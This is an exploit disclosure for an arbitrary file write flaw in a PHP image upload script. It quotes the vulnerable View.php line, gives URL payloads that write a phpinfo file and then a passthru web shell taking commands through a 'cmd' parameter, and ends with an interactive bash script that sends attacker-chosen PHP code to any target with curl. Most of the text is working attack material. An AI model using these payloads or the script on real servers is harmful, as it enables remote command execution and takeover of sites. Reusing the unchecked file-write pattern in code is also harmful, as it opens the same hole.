[+] Exploit Title : Scripteen İmage Upload Script Arbitrary File Injection

[+] Venedor Home Page : https://scripteen.com/
[+] Author : z3r0fy
[+] Twitter : z3r0fy
[+] Website : www.bugcontainer.gq
[+] CX Security Link : https://cxsecurity.com/issue/WLB-2019100145

[+] Description :

Due to these codes in the View.php file

$home  =  fopen($_GET["file"],  "w");  fwrite($home,  $_GET["data"]);

File can be written arbitrarily
Exploit :  /app/view.php?file=shell.php&data=<?php phpinfo();?>
If you want to be made more offensive,
app/view.php?file=shell.php&data=<?php passthru($_GET["cmd"]);?>
After poc is applied, This way the command can be run on the server "shell.php?cmd=" ​​



[+] PoC :

#!/bin/bash
echo "
 __________ ____   ___  _______   __
|__  /___ /|  _ \ / _ \|  ___\ \ / /
  / /  |_ \| |_) | | | | |_   \ V /
 / /_ ___) |  _ <| |_| |  _|   | |
/____|____/|_| \_\\___/|_|     |_|

"
echo" "
echo -n "[+] TARGET : " ;read hedef
echo -n "[+] PHP Code : " ;read kod
curl $hedef/app/view.php?file=shell.php&data=$kod